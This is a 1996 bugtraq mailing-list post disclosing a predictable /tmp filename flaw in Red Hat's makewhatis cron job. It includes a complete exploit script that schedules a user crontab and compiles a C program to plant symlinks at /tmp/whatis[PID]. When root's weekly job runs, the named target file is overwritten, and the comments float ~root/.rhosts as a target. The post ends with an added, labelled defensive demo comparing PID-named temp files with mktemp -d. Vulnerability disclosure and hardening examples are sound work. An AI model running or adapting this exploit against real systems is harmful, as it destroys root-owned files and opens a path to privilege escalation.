
List:       bugtraq
Subject:    cron jobs, vendors, /tmp madness, et al.
From:       "Dave G." <daveg () escape ! com>
Date:       1996-12-24 8:01:48

    This post is relevant to 2 current bugtraq topics.  First off,
shell scripts using /tmp with predictable filenames.  I found this bug
over the weekend, and it affects Redhat Linux 3.0.3/4.0.  Then today,
Darren Reed mentions this type of problem, and SNI posts an advisory.
Bad day to be a shell script running out of root's crontab.

    The second topic is vendor responses.  Redhat was quick to respond to
me about this, and said a patch/update would be ready by next week. (which
is reasonable seeing as this bug won't affect anyone until next week)

    I don't think a patch for this is a big deal anyways, just disable it
from /etc/crontab, or remove the file makewhatis.cron from /etc/cron.weekly,
if you use 4.0.

#!/bin/sh
#
# blowitawaysam
#
# makewhatis is a shellscript that stores a tmp copy of the whatis
# database in /tmp/whatis[PID].  This is easily predictable, and even
# more easily brute forced.
#
# really silly script to blow away a file on redhat 3.0.3/4.0 system
# with makewhatis in /etc/crontab.  Severely limited as you can only
# overwrite one file a week with the whatis database.
#
# If someone is really clever, maybe they can overwrite ~root/.rhosts
# and try IP spoofing in from 'cat' as user '(1)' <smirk>
#
# Dave G.
# <daveg@escape.com>
# http://www.escape.com/~daveg
# 12/21/96

NUMLINKS=150 # I dont feel like guessing.  This will hit it.
             # Admittedly, it has as much style as a clumsy leper.

if [ -x /usr/bin/crontab ] ; then
   cat << ! > evil_cron
# These are for 3.0.3
19 03 * * 1 $PWD/overwrite $1 $NUMLINKS
00 04 * * 1 /bin/rm -f /tmp/whatis* $PWD/overwrite
# These are for 4.0
00 02 * * 0 $PWD/overwrite $1 $NUMLINKS
00 03 * * 0 /bin/rm -f /tmp/whatis* $PWD/overwrite
!

   /usr/bin/crontab evil_cron 2>&1 > /dev/null
   if [ $? -ne 0 ] ; then
      echo "You are in cron.deny.  Gonna have to do it yourself."
      exit 1
   fi

# this part could have been done in shell script,
# however, I found it easier to do in C.
# Bite me Hobbit :-)

   cat << ! > overwrite.c
   #include <stdio.h>
   #include <unistd.h>

   int main(int argc, char **argv)
   {
      int i,t, really;
      pid_t sucks;
      char alot[100];

      t=atoi(argv[2]);
      sucks=getpid();
      for ( i=0 ; i<t ; i++ )
      {
         really = sucks + i;
         sprintf(alot, "/tmp/whatis%d", really);
         symlink(argv[1], alot);
      }
   }
!

   cc -O6 -o overwrite overwrite.c
   chmod 755 $PWD/overwrite
   rm overwrite.c evil_cron

   echo Everything is set up.  Leave the program overwrite exactly where it is.
   echo now you just have to wake till sunday for 4.0 or monday for 3.0.3.
else
   echo no cron for you.
fi
----


Well that is it for this week.

Dave G.
<daveg@escape.com>
http://www.escape.com/~daveg
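
The defensive side of the temp-file problem described in this post, as an added example that is not part of the original message or of any vendor patch: a PID-named temp file next to a mktemp -d replacement, run entirely inside a scratch directory. The function names, the scratch layout and the sample data are constructed for illustration.

```shell
#!/bin/sh
# Added example (constructed): the PID-named temp file from the post next to
# a mktemp-based replacement. Everything runs inside a scratch directory.

# Pattern described in the post: the name is derived from the PID and the
# redirect follows whatever already sits at that path, including a symlink.
write_predictable() {   # $1 = temp dir, $2 = data
    printf '%s\n' "$2" > "$1/whatis$$"
}

# Hardened pattern: mktemp -d atomically creates a mode-0700 directory with
# a random suffix, so no other user can pre-create anything inside it.
# The finished file is then moved to its destination, which is assumed to be
# in a directory only the job's owner can write to.
write_private() {       # $1 = temp dir, $2 = data, $3 = final destination
    work=$(mktemp -d "$1/whatis.XXXXXXXXXX") || return 1
    printf '%s\n' "$2" > "$work/db" && mv -f "$work/db" "$3"
    rc=$?
    rm -rf "$work"
    return "$rc"
}

# Simulate a shared temp dir where a link to a victim file already exists at
# the predictable name, run one writer, and print the victim's contents.
run_case() {            # $1 = "predictable" or "private"
    scratch=$(mktemp -d) || return 1
    mkdir "$scratch/tmp" "$scratch/out"
    echo "original" > "$scratch/victim"
    ln -s "$scratch/victim" "$scratch/tmp/whatis$$"
    case $1 in
        predictable) write_predictable "$scratch/tmp" "whatis data" ;;
        private)     write_private "$scratch/tmp" "whatis data" "$scratch/out/whatis" ;;
    esac
    cat "$scratch/victim"
    rm -rf "$scratch"
}

echo "predictable name: victim now contains '$(run_case predictable)'"
echo "mktemp -d:        victim still contains '$(run_case private)'"
```
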
